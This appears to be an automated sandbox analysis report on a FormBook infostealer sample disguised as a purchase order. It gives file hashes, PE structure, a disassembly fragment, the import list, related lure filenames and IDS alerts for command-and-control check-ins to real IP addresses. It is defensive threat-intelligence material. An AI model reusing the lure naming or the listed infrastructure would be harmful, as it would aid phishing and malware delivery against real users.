                    BODIS-NJUS | LgzpILNkS2.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
                    BODIS-NJUS | custom_clearance_notification_20240918.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
                    BODIS-NJUS | PURCHASE ORDER-6350.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
                    BODIS-NJUS | 2nd RFQ TECMARKQATAR PO33218_PDF.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
                    BODIS-NJUS | PO098765678.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
                    BODIS-NJUS | DCP11-83642024..exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
                    BODIS-NJUS | PO76389.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
                    PINDC-ASRU | https://91.215.85.55 | Get hash | malicious | Unknown | Browse | 91.215.85.55
                    PINDC-ASRU | file.exe | Get hash | malicious | Phorpiex | Browse | 194.93.26.70
                    PINDC-ASRU | invoice.exe | Get hash | malicious | FormBook | Browse | 91.215.85.23
                    PINDC-ASRU | Purchase order.exe | Get hash | malicious | FormBook | Browse | 91.215.85.23
                    PINDC-ASRU | Remittance advice.exe | Get hash | malicious | FormBook | Browse | 91.215.85.23
                    PINDC-ASRU | PO#86637.exe | Get hash | malicious | FormBook | Browse | 91.215.85.23
                    PINDC-ASRU | Quote #011698.exe | Get hash | malicious | FormBook | Browse | 91.215.85.23
                    PINDC-ASRU | PO#86637.exe | Get hash | malicious | FormBook | Browse | 91.215.85.23
                    PINDC-ASRU | DHL airwaybill # 6913321715 & BL Draft copy.exe | Get hash | malicious | FormBook | Browse | 91.215.85.23
                    PINDC-ASRU | PO#86637.exe | Get hash | malicious | FormBook | Browse | 91.215.85.23
                    No context
                    No context
                    Process:C:\Windows\SysWOW64\at.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\PO #86637.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):288768
                    Entropy (8bit):7.995360082616683
                    Encrypted:true
                    SSDEEP:6144:blpZPodUGyxrOnRnkvhRoi5n/ozL0cEEuT:bpQa50nevhj5n/oEFhT
                    MD5:BCE92AEE752BB034B32763E3862B589C
                    SHA1:6AA3A87EC2ED3749129ED6ADDC3E63746FA53EAC
                    SHA-256:43929BDAE3D5794838BC9AC34DE31BFF5FE3F5EAE2B641F4890EBA2DB52E0E16
                    SHA-512:BF89699C6924BB897397DAB9C56120E00D5A2C6475A20CD816D067282A414B3D6F516398DB2941874ADB29ED9FAD4463BE8074B9C278B9C72BCF16886B0C5E41
                    Malicious:false
                    Reputation:low
                    Preview:...a.J9TQ...H....l.9V...L[...3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ.TQU9'.K1.?.h.T..lb': i"A!-K5<uTY/+^8.2,.'$'m_!s....#%]1.X:2eE1L6PI9,P@../4.t2T.wY3.O....Q+.J.m)*.U...nS).k=2=.X&.1L6PI9UQ..6O.RHR.-.YTQU78AE1.6RH2TZIM`KSSIR3NJ9T.A78AU1L6 M9UQ.M6_SSIP3NL9TQU78AC1L6PI9UQ9I6OQSIR3NJ;T..78QE1\6PI9EQI]6OSSIR#NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OS}=7K:J9T5.38AU1L6.M9UAIM6OSSIR3NJ9TQu78!E1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSSIR3NJ9TQU78AE1L6PI9UQIM6OSS
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.546512456704791
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:PO #86637.exe
                    File size:1'373'705 bytes
                    MD5:7fe19c52241499f1a94815ca779701d2
                    SHA1:86a466d7ce6653c205f78c7f1d473e35b6d520e6
                    SHA256:3d0f325a9cdb285dcaef0c137211ae8d3cc2d4978c25ecc39efd38677656787c
                    SHA512:5bca92a89c0a28d052e70392118b8153093407effd693e8ee5c5e809d3bade676b463e10b8aaab5e856b694bb9a416ce2232b9145a93bd141d3e2a99a1a52bd9
                    SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCIJZ2FnbP2BuRh4kt9cOY58Hus83:7JZoQrbTFZY1iaCI8qBcikPY5+us83
                    TLSH:7855F122B5D68036C2B323B19E7FF3A9D63D69360327D19727C82D315EA05416B3A763
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                    Icon Hash:1733312925935517
                    Entrypoint:0x4165c1
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                    Instruction
                    call 00007FA908B24E8Bh
                    jmp 00007FA908B1BCFEh
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    push edi
                    push esi
                    mov esi, dword ptr [ebp+0Ch]
                    mov ecx, dword ptr [ebp+10h]
                    mov edi, dword ptr [ebp+08h]
                    mov eax, ecx
                    mov edx, ecx
                    add eax, esi
                    cmp edi, esi
                    jbe 00007FA908B1BE7Ah
                    cmp edi, eax
                    jc 00007FA908B1C016h
                    cmp ecx, 00000080h
                    jc 00007FA908B1BE8Eh
                    cmp dword ptr [004A9724h], 00000000h
                    je 00007FA908B1BE85h
                    push edi
                    push esi
                    and edi, 0Fh
                    and esi, 0Fh
                    cmp edi, esi
                    pop esi
                    pop edi
                    jne 00007FA908B1BE77h
                    jmp 00007FA908B1C252h
                    test edi, 00000003h
                    jne 00007FA908B1BE86h
                    shr ecx, 02h
                    and edx, 03h
                    cmp ecx, 08h
                    jc 00007FA908B1BE9Bh
                    rep movsd
                    jmp dword ptr [00416740h+edx*4]
                    mov eax, edi
                    mov edx, 00000003h
                    sub ecx, 04h
                    jc 00007FA908B1BE7Eh
                    and eax, 03h
                    add ecx, eax
                    jmp dword ptr [00416654h+eax*4]
                    jmp dword ptr [00416750h+ecx*4]
                    nop
                    jmp dword ptr [004166D4h+ecx*4]
                    nop
                    inc cx
                    add byte ptr [eax-4BFFBE9Ah], dl
                    inc cx
                    add byte ptr [ebx], ah
                    ror dword ptr [edx-75F877FAh], 1
                    inc esi
                    add dword ptr [eax+468A0147h], ecx
                    add al, cl
                    jmp 00007FA90AF94677h
                    add esi, 03h
                    add edi, 03h
                    cmp ecx, 08h
                    jc 00007FA908B1BE3Eh
                    rep movsd
                    jmp dword ptr [00000000h+edx*4]
                    Programming Language:
                    • [ C ] VS2010 SP1 build 40219
                    • [C++] VS2010 SP1 build 40219
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [ASM] VS2010 SP1 build 40219
                    • [RES] VS2010 SP1 build 40219
                    • [LNK] VS2010 SP1 build 40219
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                    RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                    RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                    RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                    RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
                    RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
                    RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
                    RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
                    RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
                    RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
                    RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
                    RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
                    RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
                    RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
                    RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
                    RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
                    RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
                    RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
                    RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                    RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
                    RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
                    RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
                    RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
                    RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
                    RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
                    RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
                    RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
                    RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
                    DLL | Import
                    WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                    VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                    WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                    COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                    MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                    WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                    PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                    USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                    KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                    USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                    GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                    COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
                    ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                    SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                    ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                    OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                    Language of compilation system | Country where language is spoken | Map
                    English | Great Britain |
                    English | United States |
                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                    2024-09-22T17:39:57.205741+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 34.150.58.73 | 80 | TCP
                    2024-09-22T17:39:57.205741+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49736 | 34.150.58.73 | 80 | TCP
                    2024-09-22T17:40:21.659147+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49738 | 195.24.68.25 | 80 | TCP
                    2024-09-22T17:40:24.215429+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49739 | 195.24.68.25 | 80 | TCP
                    2024-09-22T17:40:26.891623+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49740 | 195.24.68.25 | 80 | TCP
                    2024-09-22T17:40:29.297393+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49741 | 195.24.68.25 | 80 | TCP
                    2024-09-22T17:40:29.297393+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49741 | 195.24.68.25 | 80 | TCP
                    2024-09-22T17:40:35.188295+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49742 | 162.0.213.94 | 80 | TCP
                    2024-09-22T17:40:37.650196+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49743 | 162.0.213.94 | 80 | TCP
                    2024-09-22T17:40:40.218478+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49744 | 162.0.213.94 | 80 | TCP
                    2024-09-22T17:40:42.733820+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49745 | 162.0.213.94 | 80 | TCP
                    2024-09-22T17:40:42.733820+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49745 | 162.0.213.94 | 80 | TCP
                    2024-09-22T17:40:49.472166+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49746 | 154.23.184.240 | 80 | TCP
                    2024-09-22T17:40:52.031569+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49747 | 154.23.184.240 | 80 | TCP
                    2024-09-22T17:40:54.630810+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49748 | 154.23.184.240 | 80 | TCP
                    2024-09-22T17:40:57.183412+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49749 | 154.23.184.240 | 80 | TCP
                    2024-09-22T17:40:57.183412+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49749 | 154.23.184.240 | 80 | TCP
                    2024-09-22T17:41:04.176557+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49750 | 47.104.180.139 | 80 | TCP
                    2024-09-22T17:41:06.675895+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49751 | 47.104.180.139 | 80 | TCP
                    2024-09-22T17:41:09.615190+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49752 | 47.104.180.139 | 80 | TCP
                    2024-09-22T17:41:11.894995+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49753 | 47.104.180.139 | 80 | TCP
                    2024-09-22T17:41:11.894995+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49753 | 47.104.180.139 | 80 | TCP
                    2024-09-22T17:41:25.537878+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49754 | 3.33.130.190 | 80 | TCP
                    2024-09-22T17:41:28.093068+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49755 | 3.33.130.190 | 80 | TCP
